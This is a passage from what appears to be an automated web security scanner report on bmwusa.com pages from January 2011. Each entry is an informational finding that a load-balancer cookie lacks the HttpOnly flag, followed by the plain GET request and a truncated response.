User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:13 GMT;path=/
Content-Length: 256071


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.357. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/modelhighlightsrd.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/alpinab7/modelhighlightsrd.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/alpinab7/modelhighlightsrd.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Standard/Content/Vehicles/2011/7/AlpinaB7/modelhighlights/default.aspx?from=/standard/content/vehicles/2011/7/alpinab7/modelhighlightsrd.aspx&return=/standard/content/vehicles/2011/7/alpinab7/modelhighlightsrd.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 384
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 21:36:35 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:56:35 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fStandard%2fContent%2fVehicles%2f2011%2f7%2fAlpinaB7%2fmodelhighlights%2fdefault.aspx%3ffrom%3d%2fstandard%2fconten
...[SNIP]...

10.358. http://www.bmwusa.com/standard/content/vehicles/2011/7/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:33 GMT;path=/
Content-Length: 204497


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.359. http://www.bmwusa.com/standard/content/vehicles/2011/x3/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:37:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:20 GMT;path=/
Content-Length: 194389


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.360. http://www.bmwusa.com/standard/content/vehicles/2011/x3/x3savexplore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/x3savexplore.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/x3savexplore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:37:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:31 GMT;path=/
Content-Length: 179601


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.361. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:40:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:00:09 GMT;path=/
Content-Length: 211880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.362. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:37:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:47 GMT;path=/
Content-Length: 211881


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.363. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:39:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:59:39 GMT;path=/
Content-Length: 224196


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.364. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:41 GMT;path=/
Content-Length: 224197


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.365. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:25 GMT;path=/
Content-Length: 239128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.366. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:15 GMT;path=/
Content-Length: 239129


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.367. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:40:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:00:49 GMT;path=/
Content-Length: 201680


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.368. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:34 GMT;path=/
Content-Length: 201681


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.369. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:45:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:05:37 GMT;path=/
Content-Length: 212054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.370. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

